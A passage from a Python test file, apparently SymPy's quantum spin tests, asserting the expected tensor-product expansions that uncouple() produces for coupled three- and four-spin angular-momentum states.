+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)) / 3
)
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 3
- sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 3
+ TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 3
+ 2 * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)) / 3
)
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -sqrt(3)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0))
/ 3
+ sqrt(6) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)) / 3
)
# j1=1, j2=1, j3=1, j13=1
assert (
uncouple(JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)) / 2
)
assert (
uncouple(JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 3
- sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 3
)
assert (
uncouple(JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 2
+ TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))))
== TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 2
- TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))))
== TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 2
)
assert (
uncouple(JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))))
== -TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 2
)
def test_uncouple_4_coupled_states_numerical():
# j1=1/2, j2=1/2, j3=1, j4=1, default coupling
assert uncouple(JzKetCoupled(3, 3, (S.Half, S.Half, 1, 1))) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(3, 2, (S.Half, S.Half, 1, 1)))
== sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 3
)
assert (
uncouple(JzKetCoupled(3, 1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(JzKetCoupled(3, 0, (S.Half, S.Half, 1, 1)))
== sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(JzKetCoupled(3, -1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(JzKetCoupled(3, -2, (S.Half, S.Half, 1, 1)))
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
)
assert uncouple(JzKetCoupled(3, -3, (S.Half, S.Half, 1, 1))) == TensorProduct(
JzKet(S.Half, -S(1) / 2),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
assert (
uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, 1, 1)))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 3
)
assert (
uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, 1, 1)))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 3
)
assert (
uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, 1, 1)))
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 2
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 4
+ TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, 1, 1)))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 3
- sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 6
)
assert (
uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, 1, 1)))
== -sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
)
assert (
uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 30
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 30
- sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 5
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
- sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 20
- sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 5
- sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 30
)
# j1=1/2, j2=1/2, j3=1, j4=1, j12=1, j34=1
assert (
uncouple(
JzKetCoupled(
2, 2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
2, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 2
+ TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
2, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 6
)
assert (
uncouple(
JzKetCoupled(
2, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 2
+ TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 2
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
)
assert (
uncouple(
JzKetCoupled(
2, -2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
)
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 2
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
1, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
)
== sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 4
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 2
+ TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
1, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
)
== TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 2
- TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 2
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
1, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
)
== TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 2
- TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 2
- sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
- sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 4
+ sqrt(2)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 4
)
# j1=1/2, j2=1/2, j3=1, j4=1, j12=1, j34=2
assert uncouple(
